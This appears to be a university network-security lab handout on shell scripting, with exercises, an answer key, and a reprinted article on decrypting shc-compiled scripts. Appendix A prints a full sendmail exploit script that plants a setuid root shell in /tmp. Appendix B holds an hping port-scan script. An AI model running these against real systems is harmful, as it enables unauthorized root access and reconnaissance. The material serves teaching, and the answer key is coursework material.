Shell Scripting - Internetwork Security - Laboratory Report | ECE 4112, Lab Reports of Electrical and Electronics Engineering

Download Shell Scripting - Internetwork Security - Laboratory Report | ECE 4112 and more Lab Reports Electrical and Electronics Engineering in PDF only on Docsity! ECE4112 Internetwork Security Lab: Shell Scripting Date Assigned: Date Due: Last Edited: 11/18/2006 Lab Authored By: Nathan Jacobson Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the provided Answer Sheet and be sure you turn in to the TAs ALL materials listed in the Turn-in Checklist on or before the Date Due. Goal: This lab is designed to help you learn the basic aspects of shell scripting and how to use scripts as supplements to existing tools. Summary: This lab consists of two parts. In the first part, you will learn the format a shell scripts and the basic operations. In the second part, you will look at existing shell scripts and create your own. Background: Shell scripting is a basic skill that is also the ultimate tool for creating functionality when there are no existing tools. What this means is that scripting can automate and combine basic unix programs to create a specific tool capable of almost any desired effect. The uses for created tools with shell scripts is endless, from automating tedious tasks and routine checking to testing exploits and performing attacks. As with most computer security tools, shell scripting needs both knowledge of the problem and a possible solution to effectively use. Sources: Below is a list of source used to create this lab assignment. 1) http://www.hsrl.rutgers.edu/ug/shell_help.html 2) http://www.linuxsecurity.com/content/view/117920/49/ 3) http://www.windowsecurity.com/whitepapers/ Shell_Programming_an_Exploit_Explained_2.html 4) http://www.hping.org/ Equipment: You will be writing shell scripts on the Redhat WS 4.0 Host machine, although the scripts are compatible with most unix-based systems. There are example scripts and tools used in this lab that are available on the NAS, from their respective sites, or by searching google. - 1 - SECTION 1 source: 1 1.1 Creating a Script A shell script is a simple text file that contains programming code to be interpreted by a program. The first line of a shell script references the interpreter that will run the script. For example, a common first line is: #!/bin/sh The format is “#!” followed by the full path to the interpreter, with additional parameters afterwards that are optional. The execution begins with the interpreter, followed by the arguments from the script’s first line, the full path to the script, and then the arguments passed to the script. The script permissions need to be set so that it is executable, this can be done by executing the command chmod a+x myscript. Q1.1. If the first line of a script is “#!/bin/sh arg1” and the script is executed with the command “/home/myscript arg2”, what is the equivalent command and arguments that are passed to “/bin/sh”? 1.2 Input to a Script There are a couple of ways to provide input to a script: from the command line using arguments, from standard input using the keyboard, and from the contents of files. 1.2.1 Command Line Argument Input Command line arguments are referenced inside the script using the variables $0, $1, $2, … with $0 being the script and $1 being the first argument. There is also the variable $# that contains the number of arguments, the value being 1 if there are no arguments passed. 1.2.2 Standard Input To read input from the keyboard inside a script there are a couple commands such read. The example “read var” will take input from the keyboard until the ‘enter’ key is hit and put the contents in the variable “$var”. 1.2.3 File Input In addition to using the read command for input from the keyboard, it can also be used to get lines from a text file. An example script that will output the contents of a file, line by line: while read myline do echo $myline done < inputfile - 2 - 1.4.5 Functions Functions are useful for either repeated actions or for organizing code into easily readable sections. A function operates almost like its own shell script, using $0, $1, $2… for the function parameters and using return instead of exit to end execution. An example function that computes the sum of the input variables: function add() { return ($0 + $1); } 1.4.6 Redirection There are three primary redirection commands that are important for shell scripting: <, >, >>. cmd < infile directs the contents of infile as an argument to the command cmd. cmd > outfile directs the output of cmd to the file outfile. cmd >> outfile directs the output of cmd and appends it to outfile, preserving previous contents. There is also a pipe command “cmd1 | cmd2” that will take the output from the first command and use it as input for the next command, this chaining the programs together. Q1.2. Using the command sort and the files “names”, containing a list of names in random order, and “sorted_names”, containing the names in alphabetical order, what command will take the names from the randomized-list and sort it into the sorted-list file. 1.5 Useful Tools 1.5.1 Grep Grep is one of the most common unix tools, used for pattern matching and removing unwanted information from a given file or program output. The basic format of the command is: grep [pattern to match] [file to check]. This will select the lines from the given file that match the pattern; the pattern can be either basic characters or a regular expression. 1.5.2 Cut Cut is used to select portions of a line. Cut breaks the line into separate elements based on a delimiting character and returns only the chosen elements. This is useful for selecting specific elements from a line, without knowing the exact position of the text in the line. 1.5.3 Head and Tail Head and Tail are very similar commands used to select the first or last characters or lines from the given input. This is useful for seeing only the first or last lines of a given file, or removing the trailing or leading characters. A common use of the tail program is to read only the most recent lines in a log file. - 5 - 1.5.4 Cat Cat is a tool for reading a given file and output its contents to standard output. This is a common tool for viewing file contents without using a text editor. Another use is for sending the contents of a file as input to other functions such as the ones discussed above. 1.5.5 Miscellaneous Most shell scripts can produce the same effects using a variety of the basic unix tools. For example, using awk and the sub-string command has the same effect as using cut to extract a specific portion of a string from the given input. Although this lab used only a few of the common unix tools, there are many more available on typical installations of unix. To understand and make use of these other tools it is helpful to either read the manual pages, using the man command, or find user documentation online. 1.6 Tips and Tricks There are many tricks that are used to create complex scripts with advanced functionality. Some of the tricks involve debugging scripts to fix errors, special variables for enhanced functionality, and executing other programs to combine functionality. 1.6.1 Debugging There are a couple of easy methods that can help debug or examine a shell script. Using the argument –x for the sh shell or using the command “set –x” inside the script causes the line from the script to be echoed to standard output before execution. This allows the user to see the commands along side the results for better debugging. 1.6.2 Special Variables Here is a list of some of the special variables that are available to shell scripts: $# - contains the number of arguments passed to script, including the script $1…99 – contains the argument of that number 0 or &0 – refers to standard input, such as from a keyboard 1 or &1 – refers to standard output, used for regular script output 2 or &2 – refers to standard error, used for outputting error messages 1.6.3 Program Execution There are two methods of running commands within a shell script. Both are slightly different in how they work, but the use depends on the desired effect. Using the command “sh /home/myscript” will create a new instance of the shell and execute the script. The other method of executing commands is “. /home/myscript” and will run the script inside the current shell, meaning that variables used in the original script will be available to the secondary scripts. Q1.3. Using the /etc/passwd file, what command will product a sorted list of usernames that are using the sh shell? - 6 - SECTION 2 2.1 Shell Script Exploit source: 3 This shell script is a simple example of a malicious script and illustrates the need to verify and understand a script before arbitrarily running it. This script creates a small c program that exploits a sendmail smptd bug that results in a new shell with root privileges. Below is a screenshot showing the contents of the shell script and the execution that results in a shell with root access. 2.1.1 Shell Script Code #!/bin/sh echo 'main() '>>smtpdexploit.c echo '{ '>>smtpdexploit.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>smtpdexploit.c echo '} '>>smtpdexploit.c - 7 - Section 3 3.2 Defenses Although shell scripting is not itself a dangerous vulnerability or exploit, it can be used as a medium to distribute and execute malicious code. Some of the basic defenses against an attacker trying to use shell scripts against a host are typical security restrictions that should be in effect regardless of the possibility of an attack. For example, basic restrictions should be in place to prevent access to restricted files such as configuration settings, password files, and executables that are possibly dangerous. This means that user permissions and sensitive-file permissions need to be set correctly to prevent unauthorized access; access to programs such as gcc are dangerous as it can be used to compile malicious programs. 3.1 Suggested Additions This lab covers that basics of shell scripting as well as a few examples of more powerful scripts that can hide information and carry out attacks. Although the information in this lab is sufficient in gaining an understanding of shell scripts, there are possible additions to this lab that could further increase the skills and knowledge of the student. Some examples of such additions include: - Securing user and file permissions to prevent malicious activity - Using a shell script to test an exploit to find the offset values - Creating ARPWatch using the arp-command and a shell script in a loop - More advanced network scanning techniques using hping-command - 10 - ECE4112 Internetwork Security Lab: Shell Scripting Group Number: _________ Member Names: ___________________ _______________________ Answer Sheet Section 1 Q1.1. If the first line of a script is “#!/bin/sh arg1” and the script is executed with the command “/home/myscript arg2”, what is the equivalent command and arguments that are passed to “/bin/sh”? “/bin/sh arg1 /home/script arg2” Q1.2. Using the command “sort” and the files “names”, containing a list of names in random order, and “sorted_names”, containing the names in alphabetical order, what command will take the names from the randomized-list and sort it into the sorted-list file. sort < names > sorted_names OR cat names|sort>sorted_names Q1.3. Using the /etc/passwd file, what command will product a sorted list of usernames that are using the sh shell? cat /etc/passwd|grep /sh|cut –d : -f 1|sort OR grep /sh</etc/passwd|cut –d : -f 1|sort Section 2 Q2.1. Explain the basic operations of this line kill -HUP `ps ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]". This command extracts the process identifier (PID) for the binary file /tmp/smtpd and kills the process, allowing the new shell to start with root privileges. “kill –HUP” tries to restart the specified process given the PID “ps ax” lists all processes on the host “grep /tmp/smtpd” returns the line from the process list for the exploit “grep –v grep” removes any lines that contain word grep “tr –d ‘ ‘” removes all spaces from the selected lines “tr –cs ‘[:digits:]’” removes characters, leaving digits Q2.2. How would an attacker steal passwords that are arguments passed to currently running programs? - 11 - “ps –ef” shows the arguments used to execute running processes Q2.3. Why is shc vulnerable to being decrypted, even without access to the original script or source file? (hint: where is the encryption key stored?) The encryption key is stored in the binary file and can be seen in the data section of the disassembled code. ScreenShot #1 The contents of the source file (smtpscript.sh.x.c) and the execution of the binary file (smtpscript.sh.x). - 12 - Appendix A: SMTPd Exploit Script #!/bin/sh echo 'main() '>>smtpdexploit.c echo '{ '>>smtpdexploit.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0);'>>smtpdexploit.c echo '} '>>smtpdexploit.c echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c cc -o smtpdexploit smtpdexploit.c cc -o /tmp/smtpd smtpd.c ./smtpdexploit kill -HUP `ps ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` rm smtpdexploit.c smtpdexploit smtpd.c /tmp/smtpd echo "Now type: /tmp/sh" Appendix B: Port Scan Script #!/bin/sh echo "Scanning Target $1 starting from port $2 for count $3:" hping --fast -I eth0 -S $1 -p ++$2 -c $3|grep SA|cut -d ' ' -f 6|cut -d '=' -f 2 >open_ports.txt - 15 - Appendix C: Limitations of SHC Paranoid Penguin - Limitations of shc, a Shell Encryption Utility By Nalneesh Gaur on Fri, 2005-08-26 01:00. The shell script compiler, shc, obfuscates shell scripts with encryption-but the password is in the encrypted file. Could an intruder recover the original script using objdump? shc is a popular tool for protecting shell scripts that contain sensitive information such as passwords. Its popularity was driven partly by auditors' concern over passwords in scripts. shc encrypts shell scripts using RC4, makes an executable binary out of the shell script and runs it as a normal shell script. Although the resulting binary contains the encryption password and the encrypted shell script, it is hidden from casual view. At first, I was intrigued by the shc utility and considered it as a valuable tool in maintaining security of sensitive shell scripts. However, upon further inspection, I was able to extract the original shell script from the shc-generated executable for version 3.7. Because the encryption key is stored in the binary executable, it is possible for anyone with read access to the executable to recover the original shell script. This article details the process of extracting the original shell executable from the binary generated by shc. shc Overview shc is a generic shell script compiler. Fundamentally, shc takes as its input a shell script, converts it to a C program and runs the compiler to compile the C code. The C program contains the original script encrypted by an arbitrary key using RC4 encryption. RC4 is a stream cipher designed in RSA laboratories by Ron Rivest in 1987. This cipher is used widely in commercial applications, including Oracle SQL and SSL. Listing 1 demonstrates running shc. Listing 1. Running shc [user1@shiraz test]# cat pub.sh #!/bin/sh echo "Hello World" user1@shiraz test]# ./pub.sh Hello World [user1@shiraz test]# shc -v -r -f pub.sh shc shll=sh shc [-i]=-c shc [-x]=exec '%s' "$@" shc [-l]= shc opts= - 16 - shc: cc pub.sh.x.c -o pub.sh.x shc: strip pub.sh.x [user1@shiraz test]# ls pub.sh pub.sh.x pub.sh.x.c [user1@shiraz test]# ./pub.sh.x Hello World The two new files, named with the .x and .x.c extensions to the name of the source shell script, are the executable and an intermediate C version. Upon executing pub.sh.x, the original shell source is executed. shc also specifies a relax option, -r. The relax option is used to make the executable portable. Basically, shc uses the contents of the shell interpreter itself, such as /bin/sh, as a key. If the shell binary were to change, for example, due to system patching or by moving the binary to another system, the shc generated binary does not decrypt nor execute. I inspected the shell executable using strings and found no evidence of the original shell script. I also inspected the intermediate C source code and noted that it stores the shell script in encrypted octal characters, as depicted in Listing 2. Listing 2. The original shell script becomes an RC4-encrypted string in the C version. static char text[] = "\223\004\215\264\102\216\322\060\300\070\101\217\277\161\033\130" "\217\145\370\170\106\257\176\301\057\132\172\044\217\247\276\222" "\203\076\334\201\323\107\064\334\120\132\001\241\267\052\203\216" "\116\232\156\337\121\145\235\003\156\244\142\246\117\200\206\014" "\004\153\372\152\030\262\171\275\137\342\247\367\231\315\353\151" "\264\241\230\105\344\053\034\247\342\142\156\305\327\255\036\111" "\234\061\013\355\300\336\324\257\175\124\222\044\132\040\276\067" "\007\002\371\063\021\320\060"; The C source code also includes as arrays the password as well as other encrypted strings. Therefore, anyone with access to the source code easily can decrypt and view the contents of the original shell script. But what about the original shell binary executable generated by shc? Is it possible to extract the original shell script from nothing but the binary executable? The answer to this question is explored in the next section. Extraction Approach I generated and reviewed the C source code for several shell scripts to better understand how the shell source is encrypted and decrypted. Fundamentally, shc uses an - 17 - to decrypt the original shell script using only the binary as input. In shc, before the shell script itself is encrypted, many other pieces of information are encrypted. Furthermore, the RC4 implementation maintains state between encrypting and decrypting each individual piece of information. This means that the order in which shc encrypts and decrypts information must be maintained. Failure to do so results in illegible text. To extract the original shell script, we need to perform several decryptions. For this step, I wrote a small program called deshc, using the existing code from one of the intermediate C files. The program reads two files as its input, the binary executable and an input file that specifies the array lengths and addresses. deshc executes the following four steps: Reads binary executable. Extracts data section from the disassembled output. Retrieves individual arrays based on input file. Decrypts individual arrays in order, so that the RC4 state is maintained. Based on the objdump output, I have arrived at the following array lengths and addresses for the pub.sh.x executable: pswd 0x128 0x804a540 shll 0x8 0x804a672 inlo 0x3 0x804a68a xecc 0xf 0x804a68e lsto 0x1 0x804a6a4 chk1 0xf 0x804a6a6 opts 0x1 0x804a6be txt 0x76 0x804a6e0 All of these parameters are used in an input file to deshc, which then decrypts and prints the original shell script. Conclusion An approach to extract the shell source code successfully from shc version 3.7 generated binary executable was demonstrated. The pub.sh script was used for illustrative purposes only. I have indeed tested the deshc program on executables that I did not create and without access to the source code or the original shell script. Francisco García, the author of shc, recently released version 3.8. It uses somewhat different data structures and improves upon the security of the previous version. Nevertheless, I believe that embedding the encryption password within the binary executable is dangerous and prone to extraction as discussed in this article. Nalneesh Gaur, CISSP, ISAAP, works at Diamond Cluster International as a BS7799 Lead Auditor. Published here: http://www.linuxjournal.com/article/8256 - 20 - Names: _________________________ Group Number ______ Laboratory Additions Cover Sheet: Addition Title: ___________________________________________ (Include this cover page on every laboratory addition you submit.) What new concept may be learned by adding this to the existing laboratory assignment? (Or what existing concept is better learned with this addition as opposed to what is in the existing lab assignment): 1) What are the specific vulnerabilities this concept exploits and what are the defenses one can use against the vulnerabilities? Completion checklist:  Did you email an electronic copy of your laboratory addition to Henry within 24 hours after the class (and name the attachment Grx_Laby_Add.doc)? ________  Did you prepare a 5 minute in class presentation (which includes enough theory and results to educate your classmates on what you did and how you did it and discuss defenses) and email that to Henry within 24 hours after the class (and name the attachment Grx_Laby_Add.ppt)? _______  Did you include proof that you got this working in our laboratory with our equipment? (Screen shots, output, etc)? ____________  Did you include references and attributes for all materials that you used? __________  Did you write your addition so that it does not require editing to cut and paste into the lab? ____  In adding your new concepts/exercises did you include detailed lab instructions on where to get any software you may need, how to install it, how to run it, what exactly to do with it in our lab, example outputs proving that you got the enhancement to work in our lab? ___________  Did you include any theory/background and or fundamentals of the ideas and concepts behind this addition? _____________ - 21 -